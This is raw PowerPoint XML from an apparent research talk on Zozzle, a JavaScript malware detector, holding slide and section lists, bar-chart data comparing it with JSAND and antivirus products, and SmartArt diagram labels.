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36"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="350" r:id="rId3"/>
    <p:sldId id="351" r:id="rId4"/>
    <p:sldId id="312" r:id="rId5"/>
    <p:sldId id="311" r:id="rId6"/>
    <p:sldId id="362" r:id="rId7"/>
    <p:sldId id="363" r:id="rId8"/>
    <p:sldId id="364" r:id="rId9"/>
    <p:sldId id="309" r:id="rId10"/>
    <p:sldId id="325" r:id="rId11"/>
    <p:sldId id="347" r:id="rId12"/>
    <p:sldId id="294" r:id="rId13"/>
    <p:sldId id="337" r:id="rId14"/>
    <p:sldId id="338" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="289" r:id="rId17"/>
    <p:sldId id="290" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="271" r:id="rId20"/>
    <p:sldId id="353" r:id="rId21"/>
    <p:sldId id="354" r:id="rId22"/>
    <p:sldId id="352" r:id="rId23"/>
    <p:sldId id="355" r:id="rId24"/>
    <p:sldId id="356" r:id="rId25"/>
    <p:sldId id="357" r:id="rId26"/>
    <p:sldId id="334" r:id="rId27"/>
    <p:sldId id="336" r:id="rId28"/>
    <p:sldId id="342" r:id="rId29"/>
    <p:sldId id="358" r:id="rId30"/>
    <p:sldId id="348" r:id="rId31"/>
    <p:sldId id="359" r:id="rId32"/>
    <p:sldId id="360" r:id="rId33"/>
    <p:sldId id="361" r:id="rId34"/>
    <p:sldId id="34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BCAC47-CF05-43AB-B3BF-D53E2B98C546}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="350"/>
            <p14:sldId id="351"/>
            <p14:sldId id="312"/>
            <p14:sldId id="311"/>
            <p14:sldId id="362"/>
            <p14:sldId id="363"/>
            <p14:sldId id="364"/>
            <p14:sldId id="309"/>
            <p14:sldId id="325"/>
            <p14:sldId id="347"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Motivation" id="{F18F3A57-0C7E-4BBA-8561-2474426C5C8A}">
          <p14:sldIdLst>
            <p14:sldId id="294"/>
            <p14:sldId id="337"/>
            <p14:sldId id="338"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Detection" id="{921E2541-0D48-471D-B0D5-62B1206AD6BC}">
          <p14:sldIdLst>
            <p14:sldId id="268"/>
            <p14:sldId id="289"/>
            <p14:sldId id="290"/>
            <p14:sldId id="269"/>
            <p14:sldId id="271"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Zozzle" id="{2FA832C0-9A48-4926-9996-687FD6A18F3B}">
          <p14:sldIdLst>
            <p14:sldId id="353"/>
            <p14:sldId id="354"/>
            <p14:sldId id="352"/>
            <p14:sldId id="355"/>
            <p14:sldId id="356"/>
            <p14:sldId id="357"/>
            <p14:sldId id="334"/>
            <p14:sldId id="336"/>
            <p14:sldId id="342"/>
            <p14:sldId id="358"/>
            <p14:sldId id="348"/>
            <p14:sldId id="359"/>
            <p14:sldId id="360"/>
            <p14:sldId id="361"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Conclusions" id="{1B08A128-B548-4DA2-901B-54E1FC1ED8E6}">
          <p14:sldIdLst>
            <p14:sldId id="34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66FF"/>
    <a:srgbClr val="FFFF99"/>
    <a:srgbClr val="FF669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771" autoAdjust="0"/>
    <p:restoredTop sz="99475" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="80" d="100"/>
          <a:sy n="80" d="100"/>
        </p:scale>
        <p:origin x="-270" y="-3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v\RozzleSD\rozzle\Presentation\zozzle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Sheet1!$A$1:$F$1</c:f>
              <c:strCache>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>Zozzle</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>AV1</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>AV2</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>AV3</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>AV4</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>AV5</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$A$2:$F$2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233472"/>
        <c:axId val="134104192"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="132233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4104192"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="134104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223347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Sheet1!$A$18:$G$18</c:f>
              <c:strCache>
                <c:ptCount val="7"/>
                <c:pt idx="0">
                  <c:v>Zozzle</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>JSAND</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>AV1</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>AV2</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>AV3</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>AV4</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>AV5</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$A$19:$G$19</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="7"/>
                <c:pt idx="0">
                  <c:v>0.09</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.15</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.24</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.28000000000000003</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.34</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.83</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0.42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241728"/>
        <c:axId val="135243648"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="135241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5243648"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="135243648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crossAx val="1352417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cat>
            <c:numRef>
              <c:f>foo!$B$2:$B$30</c:f>
              <c:numCache>
                <c:formatCode>m/d/yyyy</c:formatCode>
                <c:ptCount val="29"/>
                <c:pt idx="0">
                  <c:v>40695</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>40696</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>40697</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>40698</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>40699</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>40700</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>40701</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>40702</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>40703</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>40704</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>40705</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>40706</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>40707</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>40708</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>40709</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>40710</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>40711</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>40712</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>40713</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>40714</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>40715</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>40716</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>40717</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>40718</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>40719</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>40720</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>40721</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>40722</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>40723</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>foo!$A$2:$A$30</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="29"/>
                <c:pt idx="0">
                  <c:v>5276</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>4801</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>4747</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>4833</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>5298</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>4486</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>3121</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>6429</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>5548</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>5164</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>5578</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>4927</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>5295</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>352</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>5604</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>8639</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>8611</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>6612</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>6025</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>6390</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>6177</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>5683</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>6095</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>6098</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>6061</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>6428</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>6326</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>6261</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>3078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20480"/>
        <c:axId val="38422016"/>
      </c:barChart>
      <c:dateAx>
        <c:axId val="384204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38422016"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblOffset val="100"/>
        <c:baseTimeUnit val="days"/>
      </c:dateAx>
      <c:valAx>
        <c:axId val="38422016"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1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384204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3AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1" loCatId="cycle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D02A7D5-6746-471C-9C77-5C1A37DD666E}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" i="1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B</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" i="1" baseline="-250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i</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" i="1" baseline="-250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gm:t>
    </dgm:pt>
    <dgm:pt modelId="{B7F70EF1-BE9B-4708-900F-0481082114D4}" type="parTrans" cxnId="{417082B0-74B7-46EA-A183-C7C9A3CB8B2C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23A8C26C-F1E5-44A8-BB40-38E5FBD65893}" type="sibTrans" cxnId="{417082B0-74B7-46EA-A183-C7C9A3CB8B2C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5093BB62-78DA-42BE-80B7-A9AC826CBE87}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" i="1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SA(B</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" i="1" baseline="-250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i</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" i="1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)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" i="1" baseline="300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gm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8185822-B812-4092-9681-B067F0905CD8}" type="parTrans" cxnId="{7F0C9722-28D1-4741-B9E0-18529921EE1C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CA8CD572-E478-4EF9-BF71-A8CE2A347039}" type="sibTrans" cxnId="{7F0C9722-28D1-4741-B9E0-18529921EE1C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6A1B5E2D-5639-42AE-ADBC-D85D50740C0A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" i="1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SA(o)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" i="1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gm:t>
    </dgm:pt>
    <dgm:pt modelId="{7EDB58CB-D494-4A48-8258-89C4B9D16ECE}" type="parTrans" cxnId="{6E2A4DF4-3EC4-48DF-BD59-5392A726D64D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3293A510-2C27-4FC6-867F-43594E568577}" type="sibTrans" cxnId="{6E2A4DF4-3EC4-48DF-BD59-5392A726D64D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CCD341BD-DD3F-4BF0-8F1B-125DFE14BD89}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" i="1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SA(H)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" i="1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gm:t>
    </dgm:pt>
    <dgm:pt modelId="{8EA01D44-F1AA-435C-B8E2-AB26BFCA6815}" type="parTrans" cxnId="{F3F329FF-7495-4F98-A23B-EED0BBCC5B75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F2A29C01-661D-4223-B2B8-479D7B2023D0}" type="sibTrans" cxnId="{F3F329FF-7495-4F98-A23B-EED0BBCC5B75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75473B90-DFE4-42BA-8202-3BA8D49C8793}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" i="1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NSA(H)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" i="1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gm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DD04201-1537-4CC1-8C90-2DAF8610793F}" type="parTrans" cxnId="{A22C682D-86A4-43C0-A320-755274D4E9A5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6FE77816-3ABE-4EC3-A618-EDEDC32A3B1A}" type="sibTrans" cxnId="{A22C682D-86A4-43C0-A320-755274D4E9A5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" i="1">
            <a:latin typeface="Freestyle Script" pitchFamily="66" charset="0"/>
            <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E83822F-5DC6-45A5-B027-18D5FBD9E1A2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0">
              <a:latin typeface="Lucida Calligraphy" pitchFamily="66" charset="0"/>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>obj</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2600" i="1" baseline="300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gm:t>
    </dgm:pt>
    <dgm:pt modelId="{38FA973B-F668-4F4A-AD1B-1357648E3F57}" type="parTrans" cxnId="{ED006E85-BAAA-4CD0-B1FF-F98F36503916}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEDFD04B-4C24-40C6-B000-DF1F7D9BFFEA}" type="sibTrans" cxnId="{ED006E85-BAAA-4CD0-B1FF-F98F36503916}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" type="pres">
      <dgm:prSet presAssocID="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6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1F11FE-0708-4901-A35E-6755011328C2}" type="pres">
      <dgm:prSet presAssocID="{5E83822F-5DC6-45A5-B027-18D5FBD9E1A2}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29D603E6-D1CA-4B35-B3FE-A5B5E8B64D13}" type="pres">
      <dgm:prSet presAssocID="{5E83822F-5DC6-45A5-B027-18D5FBD9E1A2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4910B3-A3E3-4FB6-8173-F3EA353F641F}" type="pres">
      <dgm:prSet presAssocID="{CEDFD04B-4C24-40C6-B000-DF1F7D9BFFEA}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B6BD19F-F70F-4825-8155-13EB7F5D86CC}" type="pres">
      <dgm:prSet presAssocID="{7D02A7D5-6746-471C-9C77-5C1A37DD666E}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2EEFC4A4-AF3C-486B-982F-75194A1DA8A7}" type="pres">
      <dgm:prSet presAssocID="{7D02A7D5-6746-471C-9C77-5C1A37DD666E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5B892-F379-43DC-B59B-A10218BC6885}" type="pres">
      <dgm:prSet presAssocID="{23A8C26C-F1E5-44A8-BB40-38E5FBD65893}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F05E0389-0537-4729-A64B-FF1A7F16E718}" type="pres">
      <dgm:prSet presAssocID="{5093BB62-78DA-42BE-80B7-A9AC826CBE87}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B98DCEC2-04D0-4DD5-93BF-3ED86B4CD02F}" type="pres">
      <dgm:prSet presAssocID="{5093BB62-78DA-42BE-80B7-A9AC826CBE87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7964A8-5E75-4643-8E23-B9DC31C662A8}" type="pres">
      <dgm:prSet presAssocID="{CA8CD572-E478-4EF9-BF71-A8CE2A347039}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6317A839-2063-435B-9079-E0C0534B1BB5}" type="pres">
      <dgm:prSet presAssocID="{6A1B5E2D-5639-42AE-ADBC-D85D50740C0A}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F0C3D76-C097-44BD-8861-D5701E565E18}" type="pres">
      <dgm:prSet presAssocID="{6A1B5E2D-5639-42AE-ADBC-D85D50740C0A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E22335-461B-48BA-B7B2-5C5C4823A97E}" type="pres">
      <dgm:prSet presAssocID="{3293A510-2C27-4FC6-867F-43594E568577}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E40D0F88-7C3E-40CB-A457-905A8CECD5A6}" type="pres">
      <dgm:prSet presAssocID="{CCD341BD-DD3F-4BF0-8F1B-125DFE14BD89}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA7DD902-AE6A-4281-915A-FCF738B93D4F}" type="pres">
      <dgm:prSet presAssocID="{CCD341BD-DD3F-4BF0-8F1B-125DFE14BD89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8C96F-64FA-4EBF-8D28-682A05591407}" type="pres">
      <dgm:prSet presAssocID="{F2A29C01-661D-4223-B2B8-479D7B2023D0}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB87361A-0417-47BD-8FAB-AA94F54635DE}" type="pres">
      <dgm:prSet presAssocID="{75473B90-DFE4-42BA-8202-3BA8D49C8793}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0EFE44DC-8BC8-406D-AC6C-5B9DF13F9963}" type="pres">
      <dgm:prSet presAssocID="{75473B90-DFE4-42BA-8202-3BA8D49C8793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3E440-24ED-4D0A-B594-1FB1A79645C6}" type="pres">
      <dgm:prSet presAssocID="{6FE77816-3ABE-4EC3-A618-EDEDC32A3B1A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0D19CF4C-0B7B-4C7B-AFD4-353DB2F3E5BA}" type="presOf" srcId="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" destId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{A22C682D-86A4-43C0-A320-755274D4E9A5}" srcId="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" destId="{75473B90-DFE4-42BA-8202-3BA8D49C8793}" srcOrd="5" destOrd="0" parTransId="{1DD04201-1537-4CC1-8C90-2DAF8610793F}" sibTransId="{6FE77816-3ABE-4EC3-A618-EDEDC32A3B1A}"/>
    <dgm:cxn modelId="{7F0C9722-28D1-4741-B9E0-18529921EE1C}" srcId="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" destId="{5093BB62-78DA-42BE-80B7-A9AC826CBE87}" srcOrd="2" destOrd="0" parTransId="{E8185822-B812-4092-9681-B067F0905CD8}" sibTransId="{CA8CD572-E478-4EF9-BF71-A8CE2A347039}"/>
    <dgm:cxn modelId="{973D0A06-7ED4-4334-84B9-4B1B6CCF17CD}" type="presOf" srcId="{5093BB62-78DA-42BE-80B7-A9AC826CBE87}" destId="{B98DCEC2-04D0-4DD5-93BF-3ED86B4CD02F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{118EAA33-FA34-40BD-B570-FEF26A958D47}" type="presOf" srcId="{CCD341BD-DD3F-4BF0-8F1B-125DFE14BD89}" destId="{CA7DD902-AE6A-4281-915A-FCF738B93D4F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{417082B0-74B7-46EA-A183-C7C9A3CB8B2C}" srcId="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" destId="{7D02A7D5-6746-471C-9C77-5C1A37DD666E}" srcOrd="1" destOrd="0" parTransId="{B7F70EF1-BE9B-4708-900F-0481082114D4}" sibTransId="{23A8C26C-F1E5-44A8-BB40-38E5FBD65893}"/>
    <dgm:cxn modelId="{CD6F6047-6E10-411B-8A48-5D74C7BA8084}" type="presOf" srcId="{7D02A7D5-6746-471C-9C77-5C1A37DD666E}" destId="{2EEFC4A4-AF3C-486B-982F-75194A1DA8A7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{6A4B4360-EC4C-4EAD-893B-6C46145256AE}" type="presOf" srcId="{5E83822F-5DC6-45A5-B027-18D5FBD9E1A2}" destId="{29D603E6-D1CA-4B35-B3FE-A5B5E8B64D13}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{F3F329FF-7495-4F98-A23B-EED0BBCC5B75}" srcId="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" destId="{CCD341BD-DD3F-4BF0-8F1B-125DFE14BD89}" srcOrd="4" destOrd="0" parTransId="{8EA01D44-F1AA-435C-B8E2-AB26BFCA6815}" sibTransId="{F2A29C01-661D-4223-B2B8-479D7B2023D0}"/>
    <dgm:cxn modelId="{6E2A4DF4-3EC4-48DF-BD59-5392A726D64D}" srcId="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" destId="{6A1B5E2D-5639-42AE-ADBC-D85D50740C0A}" srcOrd="3" destOrd="0" parTransId="{7EDB58CB-D494-4A48-8258-89C4B9D16ECE}" sibTransId="{3293A510-2C27-4FC6-867F-43594E568577}"/>
    <dgm:cxn modelId="{43ACB1E2-4A44-41A2-ABA6-C3162A8544E0}" type="presOf" srcId="{75473B90-DFE4-42BA-8202-3BA8D49C8793}" destId="{0EFE44DC-8BC8-406D-AC6C-5B9DF13F9963}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{7E4B6B83-D71D-4F72-A98C-552E9302DA22}" type="presOf" srcId="{6FE77816-3ABE-4EC3-A618-EDEDC32A3B1A}" destId="{3E33E440-24ED-4D0A-B594-1FB1A79645C6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{65E75DB9-0A45-4506-A8E7-E5BC4A75E485}" type="presOf" srcId="{CEDFD04B-4C24-40C6-B000-DF1F7D9BFFEA}" destId="{C84910B3-A3E3-4FB6-8173-F3EA353F641F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{701FD3EB-981E-474C-AC23-228697AA15A6}" type="presOf" srcId="{6A1B5E2D-5639-42AE-ADBC-D85D50740C0A}" destId="{2F0C3D76-C097-44BD-8861-D5701E565E18}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{3C455B1E-2A84-461B-88FD-CD516138E2DD}" type="presOf" srcId="{F2A29C01-661D-4223-B2B8-479D7B2023D0}" destId="{46E8C96F-64FA-4EBF-8D28-682A05591407}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{020077CC-6088-48D5-A600-1358BF86910C}" type="presOf" srcId="{23A8C26C-F1E5-44A8-BB40-38E5FBD65893}" destId="{5735B892-F379-43DC-B59B-A10218BC6885}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{A6B2A275-4D12-4DB4-8D48-098B58F14ABF}" type="presOf" srcId="{CA8CD572-E478-4EF9-BF71-A8CE2A347039}" destId="{BB7964A8-5E75-4643-8E23-B9DC31C662A8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{ED006E85-BAAA-4CD0-B1FF-F98F36503916}" srcId="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" destId="{5E83822F-5DC6-45A5-B027-18D5FBD9E1A2}" srcOrd="0" destOrd="0" parTransId="{38FA973B-F668-4F4A-AD1B-1357648E3F57}" sibTransId="{CEDFD04B-4C24-40C6-B000-DF1F7D9BFFEA}"/>
    <dgm:cxn modelId="{5B71D73A-F6DC-4519-82F5-2BC422756FF4}" type="presOf" srcId="{3293A510-2C27-4FC6-867F-43594E568577}" destId="{17E22335-461B-48BA-B7B2-5C5C4823A97E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
